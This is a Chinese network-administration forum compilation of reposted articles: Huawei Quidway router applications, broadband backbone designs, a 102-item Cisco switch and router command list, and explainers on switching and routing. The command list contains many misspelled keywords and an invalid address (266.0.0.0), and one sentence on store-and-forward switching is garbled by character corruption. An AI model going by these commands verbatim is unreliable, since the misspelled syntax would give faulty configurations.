    使用此命令来启用或禁止时间段包过滤功能，可以通过show firewall命令看到，也可以通过show timerange命令看到配置结果。在时间段包过滤功能被启用后，系统将根据当前的时间和设置的时间段来确定使用时间段内（特殊）的规则还是时间段外（普通）的规则。系统查询时间段的精确度为1分钟。所设置的时间段的两个端点属于时间段之内。

    【举例】

    启用时间段包过滤功能。

    Quidway(config)#timerange enable

    【相关命令】

    settr，show timerange
--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


华为路由器用在关键部门

《一键清理系统垃圾》

华为路由器用在关键部门

    Quidway系列路由器及以太网交换机在获得信息产业部入网证后，又连续通过原邮电部数据所、传输所、邮政绿卡中心、国防科工委、ISO9001、国际TUVEMC、国家信息安全评测中心及建行、农行总行等机构组织的各类指标测试与入网认证，从而得以广泛地应用于银行、电信、邮政、政府等各个关键行业。下面简介Quidway系列路由器的具体应用。

    ■Quidway R2509/2511路由器组建四川建行网络

    图1以Quidway系列路由器在四川省建设银行的网络为例，简单地说明了Quidway系列路由器在银行系统及类似环境中的主流应用，即采用QuidwayR2509/2511路由器做小型接入服务器的应用。

    Quidway R2509/2511路由器特别适合于作为小型的Modem接入设备，可以接入8/16个用户，配合验收、计费、防火墙、VPN等技术，使银行的网络规划得心应手。

    ■Quidway R4001在湖南电信网中的应用

    Quidway R4001是华为公司根据中国国情推出的一种E1接口低端路由器，非常适合中国的电信业需求。图2是湖南电信网络中QuidwayR4001路由器的应用方法。

    在市级局的中心网络，通过QuidwayR4001路由器的E1接口直接连接到传输设备的E1接口上，同样县级网络的QuidwayR4001路由器接到传输网络对端设备上，可获得2M带宽，用QuidwayR4001简单实现了2M带宽的分配，同时减少了接入设备的使用。该方案现在已经在衡阳、邵阳、永州等地区应用，下一步将在湖南全省推广。

    ■QuidwayR1603/1604路由器为政府上网开道

    在政府上网及公安、海关网络应用中也大量使用了Quidway路由器，其中小巧的Quidway R1603/1604路由器备受青睐，能够提供一个多协议串口、一个BR1口，是用于小型办公环境的网络产品。图3为Quidway系列路由器在政府上网工程中的应用。

    此网的特点是使用了ISDN和ISDN路由器Quidway R1604，可以为每一个机构提供高达128k的上网速率，并且可以充分利用ISDN的各种特性，是市政府上网的优秀方案。

    ■Quidway R3640/3680应用于中型网络核心

    华为公司Quidway R3640/3680现已开始推出，这两款是位于中型网络核心的路由器，在辽宁移动通信网管、四川邮政综合骨干网等都得到了应用，充分证明了Quidway路由器在中高端产品领域的实力。图4是QuidwayR3680在华为公司华北片区网络的应用。

    QuidwayR3680路由器能够提供较高性能的处理能力，是模块化路由器，提供种类丰富的接口：E1、10/100M以太网、同步串口、异步串口、ISDNBRI口等。在实际应用中为客户提供高性能价格比的数据通信网络解决方案。

    另外， Quidway路由器极高的稳定性、完善的网络“自愈”功能，使其在严格的试验测试中脱颖而出，在军队中得到大规模应用，例如某中心军区自动化网络、某高科技军种指挥网络等。

    图1

    图2

    图3

    图4

返回


几种宽带骨干网模式

《一键清理系统垃圾》

几种宽带骨干网模式

    宽带综合业务数字网络的发展离不开智能网技术、光纤传输技术和交换技术的发展，尤其是以IP和ATM为代表的分组转发和交换技术是当前网络建设中的热点。IP的灵活特性和ATM的快速交换能力，互有千秋，必将在将来的网络技术中，起到关键的作用。在骨干网交换技术的选择中甚至有更多的人相信，IP和ATM会长期相依相存，相互融合，而不是谁代替谁。骨干网的建设影响到接入网的技术方式和设备选型，从这个意义上来说，通信核心网络的建设方案应值得充分重视和研究。

    基于路由器的宽带骨干网

    目前运行中的绝大多数IP网都是用路由器来建设的，骨干网之间采用全网状连接，采用路由器作为骨干节点的网络设备，构成多媒体通信网的骨干通道。骨干网节点构成一个自治区域，自治区域内采用OSPF路由协议。

    一般对节点路由器交换能力至少大于1Gbps，单个端口的速率应在622Mbps以上。利用传统路由器来组网是不现实的,新一代超高速路由器改变了传统的总线方式，在路由交换中采用纵横交叉的硬件交换，其交换核心是一个交换矩阵，使新一代路由器可以直接接入SDH网，速率可达60Gbps以上，同时使网络的结构大为简化。新一代路由器采用了定长的内部IP包，适合于硬件处理，在网络边缘则仍沿用传统的转发方式；分散在各通道的CPU结构使系统的处理能力大大超过总线方式的吞吐量。它能支持目前所有的路由协议，因此采用新一代路由器来建立多媒体通信骨干网是可行的，具有一定的竞争力。

    由于骨干网支持多媒体业务，需要系统具备一定的QoS保证。由于IP网络采用带宽预约机制，因此网络节点应支持RSVP协议；多播业务要求节点具备支持组播功能；拨号虚拟专网（VPDN）则要求骨干网支持隧道技术并具备一定的安全防护措施。

    当然，用路由器来组建IP网的骨干网尚有一些缺点：首先，它的寻址仍是Hop by Hop方式，其端到端的时延比较大；其次，严格选用路由器组成的网络最适合进行IP业务，对于开展某些对时延要求严格的实时多媒体业务将导致一定的困难；第三，IP网络的地址分配问题是另一难点。由于IPv4的地址现在是一种稀缺资源，全国骨干网IP地址分配的原则应为：骨干网网络占用前两个B类容量地址，同一区域分配的IP地址尽可能连续，各省的网络地址使用本省IP地址的前段。

    基于ATM的宽带骨干网

    随着通信速率的提高及网络规模的扩大，要求骨干网的交换速率越快越好，除高速路由器外，还可以利用ATM交换机来建设IP网。在这种模式下，首先需解决ATM和IP的地址映射问题。由于ATM是面向连接的技术，而IP是不面向连接的，在一个面向连接的ATM网上承载非面向连接的业务，其集成方案有叠加模式和集成模式两类。

    叠加模式的最大特点是ATM中原有的信令、寻址方式无需改变，IP只是作为其承载的业务之一，其典型的模式有：LNAE、IPOA、MPOA等。

    集成模式是指IP设备已融入ATM设备之中，此时ATM寻址不再独立，其中的功能模块称IP控制模块。它既具有传统路由器的功能，又具有控制ATM虚通路建立的能力。

    随着光纤技术的发展，宽带骨干网的建设起初是围绕ATM综合宽带技术展开的。随着IP技术的应用，IP已进入核心网络的范围，ATM和IP的融合成为技术发展的主流。随着光纤宽带传输系统的出现，还将会出现具有更高传输速率的交换系统，如IP over WDM、IP over SONET，全光网络作为速率更高的骨干网技术也正在研究之中，以光方式交换的ATM交换机的一些设备也已有试验产品出现。

返回


交换机命令全集

《一键清理系统垃圾》

交换机命令全集

出处：网络转载

1.在基于IOS的交换机上设置主机名/系统名:
switch(config)# hostname hostname
在基于CLI的交换机上设置主机名/系统名:
switch(enable) set system name name-string
2.在基于IOS的交换机上设置登录口令:
switch(config)# enable password level 1 password
在基于CLI的交换机上设置登录口令:
switch(enable) set password
switch(enable) set enalbepass
3.在基于IOS的交换机上设置远程访问:
switch(config)# interface vlan 1
switch(config-if)# ip address ip-address netmask
switch(config-if)# ip default-gateway ip-address
在基于CLI的交换机上设置远程访问:
switch(enable) set interface sc0 ip-address netmask broadcast-address
switch(enable) set interface sc0 vlan
switch(enable) set ip route default gateway
4.在基于IOS的交换机上启用和浏览CDP信息:
switch(config-if)# cdp enable
switch(config-if)# no cdp enable
为了查看Cisco邻接设备的CDP通告信息:
switch# show cdp interface [type modle/port]
switch# show cdp neighbors [type module/port] [detail]
在基于CLI的交换机上启用和浏览CDP信息:
switch(enable) set cdp {enable|disable} module/port
为了查看Cisco邻接设备的CDP通告信息:
switch(enable) show cdp neighbors[module/port] [vlan|duplex|capabilities|detail]
5.基于IOS的交换机的端口描述:
switch(config-if)# description description-string
基于CLI的交换机的端口描述:
switch(enable)set port name module/number description-string
6.在基于IOS的交换机上设置端口速度:
switch(config-if)# speed{10|100|auto}
在基于CLI的交换机上设置端口速度:
switch(enable) set port speed moudle/number {10|100|auto}
switch(enable) set port speed moudle/number {4|16|auto}
7.在基于IOS的交换机上设置以太网的链路模式:
switch(config-if)# duplex {auto|full|half}
在基于CLI的交换机上设置以太网的链路模式:
switch(enable) set port duplex module/number {full|half}
8.在基于IOS的交换机上配置静态VLAN:
switch# vlan database
switch(vlan)# vlan vlan-num name vla
switch(vlan)# exit
switch# configure teriminal
switch(config)# interface interface module/number
switch(config-if)# switchport mode access
switch(config-if)# switchport access vlan vlan-num
switch(config-if)# end
在基于CLI的交换机上配置静态VLAN:
switch(enable) set vlan vlan-num [name name]
switch(enable) set vlan vlan-num mod-num/port-list
9. 在基于IOS的交换机上配置VLAN中继线:
switch(config)# interface interface mod/port
switch(config-if)# switchport mode trunk
switch(config-if)# switchport trunk encapsulation {isl|dotlq}
switch(config-if)# switchport trunk allowed vlan remove vlan-list
switch(config-if)# switchport trunk allowed vlan add vlan-list
在基于CLI的交换机上配置VLAN中继线:
switch(enable) set trunk module/port [on|off|desirable|auto|nonegotiate]
Vlan-range [isl|dotlq|dotl0|lane|negotiate]
--------------------------------------------------------------------------------
作者: mfq　　时间: 2006-5-24 08:40

10.在基于IOS的交换机上配置VTP管理域:
switch# vlan database
switch(vlan)# vtp domain domain-name
在基于CLI的交换机上配置VTP管理域:
switch(enable) set vtp [domain domain-name]
11.在基于IOS的交换机上配置VTP 模式:
switch# vlan database
switch(vlan)# vtp domain domain-name
switch(vlan)# vtp {sever|cilent|transparent}
switch(vlan)# vtp password password
在基于CLI的交换机上配置VTP 模式:
switch(enable) set vtp [domain domain-name] [mode{ sever|cilent|transparent }][password password]
12. 在基于IOS的交换机上配置VTP版本:
switch# vlan database
switch(vlan)# vtp v2-mode
在基于CLI的交换机上配置VTP版本:
switch(enable) set vtp v2 enable
13. 在基于IOS的交换机上启动VTP剪裁:
switch# vlan database
switch(vlan)# vtp pruning
在基于CL I 的交换机上启动VTP剪裁:
switch(enable) set vtp pruning enable
14.在基于IOS的交换机上配置以太信道:
switch(config-if)# port group group-number [distribution {source|destination}]
在基于CLI的交换机上配置以太信道:
switch(enable) set port channel moudle/port-range mode{on|off|desirable|auto}
15.在基于IOS的交换机上调整根路径成本:
switch(config-if)# spanning-tree [vlan vlan-list] cost cost
在基于CLI的交换机上调整根路径成本:
switch(enable) set spantree portcost moudle/port cost
switch(enable)
set spantree portvlancost moudle/port [cost cost][vlan-list]
16.在基于IOS的交换机上调整端口ID:
switch(config-if)# spanning-tree[vlan vlan-list]port-priority port-priority
在基于CLI的交换机上调整端口ID:
switch(enable) set spantree portpri {mldule/port}priority
switch(enable) set spantree portvlanpri {module/port}priority [vlans]
17. 在基于IOS的交换机上修改STP时钟:
switch(config)# spanning-tree [vlan vlan-list] hello-time seconds
switch(config)# spanning-tree [vlan vlan-list] forward-time seconds
switch(config)# spanning-tree [vlan vlan-list] max-age seconds
在基于CLI的交换机上修改STP时钟:
switch(enable) set spantree hello interval[vlan]
switch(enable) set spantree fwddelay delay [vlan]
switch(enable) set spantree maxage agingtiame[vlan]
18. 在基于IOS的交换机端口上启用或禁用Port Fast 特征:
switch(config-if)#spanning-tree portfast
在基于CLI的交换机端口上启用或禁用Port Fast 特征:
switch(enable) set spantree portfast {module/port}{enable|disable}
19. 在基于IOS的交换机端口上启用或禁用UplinkFast 特征:
switch(config)# spanning-tree uplinkfast [max-update-rate pkts-per-second]
在基于CLI的交换机端口上启用或禁用UplinkFast 特征:
switch(enable) set spantree uplinkfast {enable|disable}[rate update-rate] [all-protocols off|on]
20. 为了将交换机配置成一个集群的命令交换机,首先要给管理接口分配一个IP地址,然后使用下列命令: switch(config)# cluster enable cluster-name
21. 为了从一条中继链路上删除VLAN,可使用下列命令:
switch(enable) clear trunk module/port vlan-range
--------------------------------------------------------------------------------
作者: mfq　　时间: 2006-5-24 08:41

22. 用show vtp domain 显示管理域的VTP参数.
23. 用show vtp statistics显示管理域的VTP参数.
24. 在Catalyst交换机上定义TrBRF的命令如下:
switch(enable) set vlan vlan-name [name name] type trbrf bridge bridge-num[stp {ieee|ibm}]
25. 在Catalyst交换机上定义TrCRF的命令如下:
switch (enable) set vlan vlan-num [name name] type trcrf
{ring hex-ring-num|decring decimal-ring-num} parent vlan-num
26. 在创建好TrBRF VLAN之后,就可以给它分配交换机端口.对于以太网交换,可以采用如下命令给VLAN分配端口:
switch(enable) set vlan vlan-num mod-num/port-num
27. 命令show spantree显示一个交换机端口的STP状态.
28. 配置一个ELAN的LES和BUS,可以使用下列命令:
ATM (config)# interface atm number.subint multioint
ATM(config-subif)# lane serber-bus ethernet elan-name
29. 配置LECS:
ATM(config)# lane database database-name
ATM(lane-config-databade)# name elan1-name server-atm-address les1-nsap-address
ATM(lane-config-databade)# name elan2-name server-atm-address les2-nsap-address
ATM(lane-config-databade)# name …
30. 创建完数据库后,必须在主接口上启动LECS.命令如下:
ATM(config)# interface atm number
ATM(config-if)# lane config database database-name
ATM(config-if)# lane config auto-config-atm-address
31. 将每个LEC配置到一个不同的ATM子接口上.命令如下:
ATM(config)# interface atm number.subint multipoint
ATM(config)# lane client ethernet vlan-num elan-num
32. 用show lane server 显示LES的状态.
33. 用show lane bus显示bus的状态.
34. 用show lane database显示LECS数据库可内容.
35. 用show lane client显示LEC的状态.
36. 用show module显示已安装的模块列表.
37. 用物理接口建立与VLAN的连接:
router# configure terminal
router(config)# interface media module/port
router(config-if)# description description-string
router(config-if)# ip address ip-addr subnet-mask
router(config-if)# no shutdown
38. 用中继链路来建立与VLAN的连接:
router(config)# interface module/port.subinterface
router(config-ig)# encapsulation[isl|dotlq] vlan-number
router(config-if)# ip address ip-address subnet-mask
39. 用LANE 来建立与VLAN的连接:
router(config)# interface atm module/port
router(config-if)# no ip address
router(config-if)# atm pvc 1 0 5 qsaal
router(config-if)# atm pvc 2 0 16 ilni
router(config-if)# interface atm module/port.subinterface multipoint
router(config-if)# ip address ip-address subnet-mask
router(config-if)# lane client ethernet elan-num
router(config-if)# interface atm module/port.subinterface multipoint
router(config-if)# ip address ip-address subnet-name
router(config-if)# lane client ethernet elan-name
router(config-if)# …
--------------------------------------------------------------------------------
作者: mfq　　时间: 2006-5-24 08:42

40. 为了在路由处理器上进行动态路由配置,可以用下列IOS命令来进行:
router(config)# ip routing
router(config)# router ip-routing-protocol
router(config-router)# network ip-network-number
router(config-router)# network ip-network-number
41. 配置默认路由:
switch(enable) set ip route default gateway
42. 为一个路由处理器分配VLANID,可在接口模式下使用下列命令:
router(config)# interface interface number
router(config-if)# mls rp vlan-id vlan-id-num
43. 在路由处理器启用MLSP:
router(config)# mls rp ip
44. 为了把一个外置的路由处理器接口和交换机安置在同一个VTP域中:
router(config)# interface interface number
router(config-if)# mls rp vtp-domain domain-name
45. 查看指定的VTP域的信息:
router# show mls rp vtp-domain vtp domain name
46. 要确定RSM或路由器上的管理接口,可以在接口模式下输入下列命令:
router(config-if)#mls rp management-interface
47. 要检验MLS-RP的配置情况：
router# show mls rp
48. 检验特定接口上的MLS配置：
router# show mls rp interface interface number
49. 为了在MLS-SE上设置流掩码而又不想在任一个路由处理器接口上设置访问列表：
set mls flow [destination|destination-source|full]
50. 为使MLS和输入访问列表可以兼容，可以在全局模式下使用下列命令：
router(config)# mls rp ip input-acl
51. 当某个交换机的第3层交换失效时，可在交换机的特权模式下输入下列命令：
switch(enable) set mls enable　52. 若想改变老化时间的值，可在特权模式下输入以下命令：
switch(enable) set mls agingtime agingtime
53. 设置快速老化：
switch(enable) set mls agingtime fast fastagingtime pkt_threshold
54. 确定那些MLS-RP和MLS-SE参与了MLS，可先显示交换机引用列表中的内容再确定：
switch(enable) show mls include
55. 显示MLS高速缓存记录：
switch(enable) show mls entry
56. 用命令show in arp显示ARP高速缓存区的内容。
57. 要把路由器配置为HSRP备份组的成员，可以在接口配置模式下使用下面的命令：
router(config-if)# standby group-number ip ip-address
58. 为了使一个路由器重新恢复转发路由器的角色，在接口配置模式下：
router(config-if)# standy group-number preempt
59. 访问时间和保持时间参数是可配置的：
router(config-if)# standy group-number timers hellotime holdtime
60. 配置HSRP跟踪：
router(config-if)# standy group-number track type-number interface-priority
61. 要显示HSRP路由器的状态：
router# show standby type-number group brief
62. 用命令show ip igmp确定当选的查询器。
63. 启动IP组播路由选择：
router(config)# ip muticast-routing
64. 启动接口上的PIM：
dalllasr1>(config-if)# ip pim {dense-mode|sparse-mode|sparse-dense-mode}
65. 启动稀疏-稠密模式下的PIM：
router# ip multicast-routing
router# interface type number
router# ip pim sparse-dense-mode
66. 核实PIM的配置：
dallasr1># show ip pim interface[type number] [count]
67. 显示PIM邻居：dallasr1># show ip neighbor type number
--------------------------------------------------------------------------------
作者: mfq　　时间: 2006-5-24 08:43

68. 为了配置RP的地址，命令如下：
dallasr1># ip pim rp-address ip-address [group-access-list-number][override]
69. 选择一个默认的RP：
dallasr1># ip pim rp-address
通告RP和它所服务的组范围：
dallasr1># ip pim send-rp-announce type number scope ttl group-list access-list-number
为管理范围组通告RP的地址：
dallasr1># ip pim send-rp-announce ethernet0 scope 16 group-list1
dallasr1># access-list 1 permit 266.0.0.0 0.255.255.255
设定一个RP映像代理：
dallasr1># ip pim send-rp-discovery scope ttl
核实组到RP的映像：
dallasr1># show ip pim rp mapping
dallasr1># show ip pim rp [group-name|group-address] [mapping]
70. 在路由器接口上用命令ip multicast ttl-threshold ttl-value设定TTL阀值：
dallasr1>(config-if)# ip multicast ttl-threshold ttl-value
71. 用show ip pim neighbor显示PIM邻居表。
72. 显示组播通信路由表中的各条记录：
dallasr1>show ip mroute [group-name|group-address][scoure][summary][count][active kbps]
73. 要记录一个路由器接受和发送的全部IP组播包：
dallasr1> #debug ip mpacket [detail] [access-list][group]
74. 要在CISCO路由器上配置CGMP：
dallasr1>(config-if)# ip cgmp
75.配置一个组播路由器，使之加入某一个特定的组播组：
dallasr1>(config-if)# ip igmp join-group group-address
76. 关闭 CGMP：dallasr1>(config-if)# no ip cgmp
77. 启动交换机上的CGMP：
dallasr1>(enable) set cgmp enable
78. 核实Catalyst交换机上CGMP的配置情况：
catalystla1>(enable) show config
set prompt catalystla1>
set interface sc0 192.168.1.1 255.255.255.0
set cgmp enable
79. CGMP离开的设置：
Dallas_SW(enable) set cgmp leave
80. 在Cisco设备上修改控制端口密码：
R1(config)# line console 0
R1(config-line)# login
R1(config-line)# password Lisbon
R1(config)# enable password Lilbao
R1(config)# login local
R1(config)# username student password cisco
81. 在Cisco设备上设置控制台及vty端口的会话超时：
R1(config)# line console 0
R1(config-line)# exec-timeout 5 10
R1(config)# line vty 0 4
R1(config-line)# exec-timeout 5 2
82. 在Cisco设备上设定特权级：
R1(config)# privilege configure level 3 username
R1(config)# privilege configure level 3 copy run start
R1(config)# privilege configure level 3 ping
R1(config)# privilege configure level 3 show run
R1(config)# enable secret level 3 cisco
83. 使用命令privilege 可定义在该特权级下使用的命令：
router(config)# privilege mode level level command
84. 设定用户特权级：
router(c onfig)# enable secret level 3 dallas
router(config)# enable secret san-fran
router(config)# username student password cisco
--------------------------------------------------------------------------------
作者: mfq　　时间: 2006-5-24 08:44

85. 标志设置与显示：
R1(config)# banner motd ‘unauthorized access will be prosecuted!’
86. 设置vty访问：
R1(config)# access-list 1 permit 192.168.2.5
R1(config)# line vty 0 4
R1(config)# access-class 1 in
87. 配置HTTP访问：
Router3(config)# access-list 1 permit 192.168.10.7
Router3(config)# ip http sever
Router3(config)# ip http access-class 1
Router3(config)# ip http authentication local
Router3(config)# username student password cisco
88. 要启用HTTP访问，请键入以下命令：
switch(config)# ip http sever
89. 在基于set命令的交换机上用setCL1启动和核实端口安全：
switch(enable) set port security mod_num/port_num…enable mac address
switch(enable) show port mod_num/port_num
在基于CiscoIOS命令的交换机上启动和核实端口安全：
switch(config-if)# port secure [mac-mac-count maximum-MAC-count]
switch# show mac-address-table security [type module/port]
90. 用命令access-list在标准通信量过滤表中创建一条记录：
Router(config)# access-list access-list-number {permit|deny} source-address [source-address]
91. 用命令access-list在扩展通信量过滤表中创建一条记录：
Router(config)# access-list access-list-number {permit|deny{protocol|protocol-keyword}}{source source-wildcard|any}{destination destination-wildcard|any}[protocol-specific options][log]
92. 对于带内路由更新，配置路由更新的最基本的命令格式是：
R1(config-router)#distribute-list access-list-number|name in [type number]
93. 对于带外路由更新，配置路由更新的最基本的命令格式是：
R1(config-router)#distribute-list access-list-number|name out [interface-name] routing-process| autonomous-system-number
94. set snmp命令选项：
set snmp community {read-only|ready-write|read-write-all}[community_string]
95. set snmp trap 命令格式如下：
set snmp trap {enable|disable}
[all|moudle|classis|bridge|repeater| auth|vtp|ippermit|vmps|config|entity|stpx]
set snmp trap rvcr_addr rcvr_community
96. 启用SNMP chassis 陷阱:
Console>(enable) set snmp trap enable chassis
97. 启用所有SNMP chassis 陷阱:
Console>(enable) set snmp trap enable
98. 禁用SNMP chassis 陷阱:
Console>(enable) set snmp trap disable chassis
99. 给SNMP陷阱接收表加一条记录：
Console>(enable) set snmp trap 192.122.173.42 public
100. show snmp 输出结果。
101. 命令set snmp rmon enable 的输出结果。
102. 显示SPAN信息：
Consile> show span


交换机详解

《一键清理系统垃圾》

交换机详解

出处：网络转载

交换 switching 是按照通信两端传输信息的需要，用人工或设备自动完成的方法，把要传输的信息送到符合要求的相应路由上的技术统称。广义的交换机switch就是一种在通信系统中完成信息交换功能的设备。
    交换和交换机最早起源于电话通讯系统（PSTN），我们现在还能在老电影中看到这样的场面：****（主叫用户）拿起话筒来一阵猛摇，局端是一排插满线头的机器，戴着耳麦的话务小姐接到连接要求后，把线头插在相应的出口，为两个用户端建立起连接，直到通话结束。这个过程就是通过人工方式建立起来的交换。当然现在我们早已普及了程控交换机，交换的过程都是自动完成。
    在计算机网络系统中，交换概念的提出是对于共享工作模式的改进。我们以前介绍过的HUB集线器就是一种共享设备，HUB本身不能识别目的地址，当同一局域网内的A主机给B主机传输数据时，数据包在以HUB为架构的网络上是以广播方式传输的，由每一台终端通过验证数据包头的地址信息来确定是否接收。也就是说，在这种工作方式下，同一时刻网络上只能传输一组数据帧的通讯，如果发生碰撞还得重试。这种方式就是共享网络带宽。
    交换机拥有一条很高带宽的背部总线和内部交换矩阵。交换机的所有的端口都挂接在这条背部总线上，控制电路收到数据包以后，处理端口会查找内存中的地址对照表以确定目的MAC（网卡的硬件地址）的NIC（网卡）挂接在哪个端口上，通过内部交换矩阵迅速将数据包传送到目的端口，目的MAC若不存在才广播到所有的端口，接收端口回应后交换机会“学习”新的地址，并把它添加入内部地址表中。
    使用交换机也可以把网络“分段”，通过对照地址表，交换机只允许必要的网络流量通过交换机。通过交换机的过滤和转发，可以有效的隔离广播风暴，减少误包和错包的出现，避免共享冲突。
    交换机在同一时刻可进行多个端口对之间的数据传输。每一端口都可视为独立的网段，连接在其上的网络设备独自享有全部的带宽，无须同其他设备竞争使用。当节点A向节点D发送数据时，节点B可同时向节点C发送数据，而且这两个传输都享有网络的全部带宽，都有着自己的虚拟连接。假使这里使用的是10Mbps的以太网交换机，那么该交换机这时的总流通量就等于2×10Mbps＝20Mbps，而使用10Mbps的共享式HUB时，一个HUB的总流通量也不会超出10Mbps。
    总之，交换机是一种基于MAC地址识别，能完成封装转发数据包功能的网络设备。交换机可以“学习”MAC地址，并把其存放在内部地址表中，通过在数据帧的始发者和目标接收者之间建立临时的交换路径，使数据帧直接由源地址到达目的地址。
交换机的分类及功能
    从广义上来看，交换机分为两种：广域网交换机和局域网交换机。广域网交换机主要应用于电信领域，提供通信用的基础平台。而局域网交换机则应用于局域网络，用于连接终端设备，如PC机及网络打印机等。从传输介质和传输速度上可分为以太网交换机、快速以太网交换机、千兆以太网交换机、FDDI交换机、ATM交换机和令牌环交换机等。从规模应用上又可分为企业级交换机、部门级交换机和工作组交换机等。各厂商划分的尺度并不是完全一致的，一般来讲，企业级交换机都是机架式，部门级交换机可以是机架式（插槽数较少），也可以是固定配置式，而工作组级交换机为固定配置式（功能较为简单）。另一方面，从应用的规模来看，作为骨干交换机时，支持500个信息点以上大型企业应用的交换机为企业级交换机，支持300个信息点以下中型企业的交换机为部门级交换机，而支持100个信息点以内的交换机为工作组级交换机。本文所介绍的交换机指的是局域网交换机。
    交换机的主要功能包括物理编址、网络拓扑结构、错误校验、帧序列以及流控。目前交换机还具备了一些新的功能，如对VLAN（虚拟局域网）的支持、对链路汇聚的支持，甚至有的还具有防火墙的功能。
    交换机除了能够连接同种类型的网络之外，还可以在不同类型的网络（如以太网和快速以太网）之间起到互连作用。如今许多交换机都能够提供支持快速以太网或FDDI等的高速连接端口，用于连接网络中的其它交换机或者为带宽占用量大的关键服务器提供附加带宽。
    一般来说，交换机的每个端口都用来连接一个独立的网段，但是有时为了提供更快的接入速度，我们可以把一些重要的网络计算机直接连接到交换机的端口上。这样，网络的关键服务器和重要用户就拥有更快的接入速度，支持更大的信息流量。
    交换机的交换方式
    交换机通过以下三种方式进行交换
　　1.直通式（Cut Through）
    直通方式的以太网交换机可以理解为在各端口间是纵横交叉的线路矩阵电话交换机。它在输入端口检测到一个数据包时，检查该包的包头，获取包的目的地址，启动内部的动态查找表转换成相应的输出端口，在输入与输出交叉处接通，把数据包直通到相应的端口，实现交换功能。由于不需要存储，延迟非常小、交换非常快，这是它的优点。它的缺点是，因为数据包内容并没有被以太网交换机保存下来，所以无法检查所传送的数据包是否有误，不能提供错误检测能力。由于没有缓存，不能将具有不同速率的输入/输出端口直接接通，而且容易丢包。
2.存储转发（Store ＆ Forward）
    存储转发方式是计算机网络领域应用最为广泛的方式。它把输入端口的数据包却娲⑵鹄矗缓蠼蠧RC（循环冗余码校验）检查，在对错误包处理后才取出数据包的目的地址，通过查找表转换成输出端口送出包。正因如此，存储转发方式在数据处理时延时大，这是它的不足，但是它可以对进入交换机的数据包进行错误检测，有效地改善网络性能。尤其重要的是它可以支持不同速度的端口间的转换，保持高速端口与低速端口间的协同工作。
    3.碎片隔离（Fragment Free）
    这是介于前两者之间的一种解决方案。它检查数据包的长度是否够64个字节，如果小于64字节，说明是假包，则丢弃该包；如果大于64字节，则发送该包。这种方式也不提供数据校验。它的数据处理速度比存储转发方式快，但比直通式慢。
    交换机的应用
    作为局域网的主要连接设备，以太网交换机成为应用普及最快的网络设备之一。随着交换技术的不断发展，以太网交换机的价格急剧下降，交换到桌面已是大势所趋。
    如果你的以太网络上拥有大量的用户、繁忙的应用程序和各式各样的服务器，而且你还未对网络结构做出任何调整，那么整个网络的性能可能会非常低。解决方法之一是在以太网上添加一个10/100Mbps的交换机，它不仅可以处理10Mbps的常规以太网数据流，而且还可以支持100Mbps的快速以太网连接。
    如果网络的利用率超过了40％，并且碰撞率大于10％，交换机可以帮你解决一点问题。带有100Mbps快速以太网和10Mbps以太网端口的交换机可以全双工方式运行，可以建立起专用的20Mbps到200Mbps连接。
    不仅不同网络环境下交换机的作用各不相同，在同一网络环境下添加新的交换机和增加现有交换机的交换端口对网络的影响也不尽相同。充分了解和掌握网络的流量模式是能否发挥交换机作用的一个非常重要的因素。因为使用交换机的目的就是尽可能的减少和过滤网络中的数据流量，所以如果网络中的某台交换机由于安装位置设置不当，几乎需要转发接收到的所有数据包的话，交换机就无法发挥其优化网络性能的作用，反而降低了数据的传输速度，增加了网络延迟。
    除安装位置之外，如果在那些负载较小，信息量较低的网络中也盲目添加交换机的话，同样也可能起到负面影响。受数据包的处理时间、交换机的缓冲区大小以及需要重新生成新数据包等因素的影响，在这种情况下使用简单的HUB要比交换机更为理想。因此，我们不能一概认为交换机就比HUB有优势，尤其当用户的网络并不拥挤，尚有很大的可利用空间时，使用HUB更能够充分利用网络的现有资源


交换网络的路由技术

《一键清理系统垃圾》

交换网络的路由技术

    交换是当前网络技术发展的方向。路由技术是交换网络的重要组成部分。交换网络中路由技术选用得正确与否，将直接影响到网络的整体性能的好坏。因此路由技术越来越受到生产厂家与网络设计人员的重视。

一、三种路由技术
    目前交换网络中的路由技术有三种，其中第一种是最为保守的方法，即第三层的路由器与第二层交换机相结合的方法。第二层交换机严格限制于桥结构，用于同一虚拟网内的不同节点之间的数据交换，在OSI参考模型的第二层，即数据链路层实现虚拟LAN的功能，将第三层的功能留给路由器实现，由路由器完成虚拟网络之间的数据传输与建立LAN与企业主干网连接的工作。
    第二种方法采用分布式路由技术。其特点是它使用多层交换机，将第二层的桥与第三层的路由结合在一起，有的文献也将多层交换机称之为第三层交换机。它本身所具有的路由功能支持虚拟LAN，并支持大多数同一虚拟网内或不同虚拟网之间节点的通信，减少了工作组与部门之间所使用的路由器的数目。但它仍然不能完全摆脱使用传统路由器，这是因为多层交换机只能提供高档路由器所能提供的协议、安全、交通管理及与WAN连接功能的子集。如CISCO公司7000系列路由器能够处理12种协议并支持点对点、电路交换与信元交换的广域网通信，而Alantec公司生产的Powerhub多层交换机却只能处理三种协议:DECnet、IP与IPX，并且没有WAN接口。因此，多层交换机网络中需要使用路由器作为广域网的网关，并完成较为复杂的路由功能。
    交换网中的第三种路由技术则采用了一种全新的结构:路由服务器与边界交换机相结合。我们知道，传统的路由器完成信息包的转发与路由选择两项工作。而基于路由服务器的网络则由两个独立的设备分别完成上述两项功能:边界交换机完成信息包的转发，而路由信息的确定由价格较为昂贵的路由服务器完成。边界交换机只有在自己的地址表中找不到目标节点的地址时才访问路由服务器，此时路由器对之响应一个正确的地址，交换机再将该信息缓存备用。需要指出的是，目前路由服务器与交换机之间的通信协议还不统一，不同厂家的产品还不兼容。

二、比较与评价
    上述三种路由技术各有特色，网络设计人员可根据实际情况加以选用。为使人们对它们有更好的了解，我们分以下四个方面对它们进行比较。
1.组网规模
    网络的大小是选择何种路由技术组网的决定性因素。第二层交换机与传统路由器相结合的办法适用于较小规模的网络，其特点是经济实用。但当主干网扩展成比较大的网络时，第二层虚拟LAN的开销将明显增大。
    随着主干网的扩展，多层交换机的智能优势得到充分发挥，由于它仅向那些属于某一特定子网的网段转发广播，因此减少了主干网上广播交通的数量。由于多层交换机组成的虚拟网络具有过滤功能，并能节省主干网的带宽与端站点的时钟，因此虚拟网络的安全性较好。另外，它与第一种方法相比，由于交换机可在工作组与部门范围内同时负责交换与路由选径工作，故节省了传统路由器使用的数目。分布式路由器法与路由服务器也比较适用于大型的分布式网络。
2.延迟
